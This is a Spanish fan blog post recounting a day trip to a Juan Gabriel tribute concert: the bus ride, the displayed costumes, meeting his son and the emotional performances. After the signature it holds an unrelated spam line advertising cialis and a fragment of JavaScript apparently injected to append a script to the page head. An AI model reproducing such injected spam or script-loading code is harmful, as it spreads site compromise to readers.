Se sentía como compartíamos nuestro dolor de extrañarlo

Comparte !

Fue una experiencia maravillosa que quedará en mi mente hasta el último sol de mi vida. Llegar 10:00 hs. al punto de salida del camión ahí empezaba mi aventura.
leticia1

Como a las 11:00 hs. conocí por fin a uno de los administradores del grupo ”Juan Gabriel (El Rey Midas de la Canción)” Juan Dimas Tapia que iba a ser mi acompañante en el viaje ya allá cada quién tenía su lugar.

En el camión viajamos muy pocos éramos como 15 personas, pero todos unidos con un solo propósito ir a homenajear a nuestro Divo, así que íbamos felices como si ya nos conociéramos y tomándonos fotos. Llegar y ver el inmenso lugar y a lo lejos alcanzar a ver un poco el escenario me hizo temblar, era antes de las 14:00 hs. faltaba para entrar, el calor estaba muy intenso era como si el sol y el calor de Juan Gabriel nos estuviera abrazando muy fuerte. Al ingresar nos separamos Juan y yo cada quién a su lugar, ya iba yo con Alicia una Fan igual que yo del mismo camión también iba sóla, llegamos a la grada 1 era la que nos tocaba casualmente.
Dejamos nuestro lugar apartado, era el primer nivel de la grada exactamente enfrente del escenario, hasta atrás de los que les tocó parados. Perfecto lugar nadie nos taparía.

leticia2Bajamos a buscar que comer y tomar, pero nos encontramos con algo impresionante 5 TRAJES DE NUESTRO DIVO bien protegidos en unas cajas de cristal, así que a tomarnos fotos. Ahí nos encontramos con Maripaz y sus hermanas, otras acompañantes del camión ellas ya traían su pulsera para entrar a la alfombra verde así que nos fuimos a formar con ellas a ver si podíamos entrar. Y si milagrosamente estaba la persona que regalaba las pulseras. Así que más emocionada, fue maravilloso empezar a ver, fotografiar y tomar la mano de cada uno de los que pasaban, los primeros fueron Iván y Simona. Pero enseguida venía Hans con esa hermosa sonrisa igual a su papá, no pude evitar gritarle amor me puedo tomar una foto contigo y tomarle su mano, era como tomar algo tan cercano a la mano de mi Divo.
Cómo empezó, que canción, que artista no lo recuerdo, yo solo no pare de cantar y bailar sentada en mi lugar, hasta que apareció el holograma con NO TENGO DINERO, me quería morir todo mi cuerpo temblaba (en ese momento todavía no hacía frío) grité hasta que ya mi garganta no pudo más.
Todos y cada uno de los invitados me hicieron vibrar sonaron espectaculares, pero hubo una en especial con la que lloré mucho INDIA, cantando DE MI ENAMORATE que interpretación pero sobretodo cuando cantó EXTRAÑO TUS OJOS, que voz, que interpretación, se sentía como compartíamos nuestro dolor de extrañarlo.

Otra que me hizo vibrar hasta el último músculo del cuerpo AIDA CUEVAS que interpretación ella también transmitió su dolor se veía como si el estuviera ahí junto a ella.
Cuando salió Juanes y el otro Holograma con QUERIDA, nuevamente otra vez la lloradera.
Fue maravilloso ver y escuchar a los músicos, coristas y Mariachi de nuestro Divo juro que se sentía su presencia.

leticiaLa ultima que fue AMOR ETERNO ya todos juntos pues otra vez cantar a grito abierto y no poder seguir porque el llanto no me dejaba.
El frío fue tremendo los pies se sentían congelados.
Y de nuevo al camión ya casi las 23:00 hs. y de vuelta encontrarme a Juan Dimas Tapia ya muy cansado, él si lo vivió parado todo el día.
Y llegar a nuestro punto de partida y cada quien a su casa.

Amigos así fue mi experiencia y emoción MUY AGRADECIDA CON DIOS Y EL UNIVERSO por la oportunidad de vivir está aventura.

Elegí esta foto porque creo fue lo que más disfrute del día tomar su mano y juro sentir que Juan Gabriel era quien me la daba.

 

Estar cerca de uno de los más grandes amores de mi Divo. No tiene precio.

Buenos días a todos y todas Dios me los bendiga

 

Leticia Guadalupe Hernández

 

 


use paypal to pay for online cialis


d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares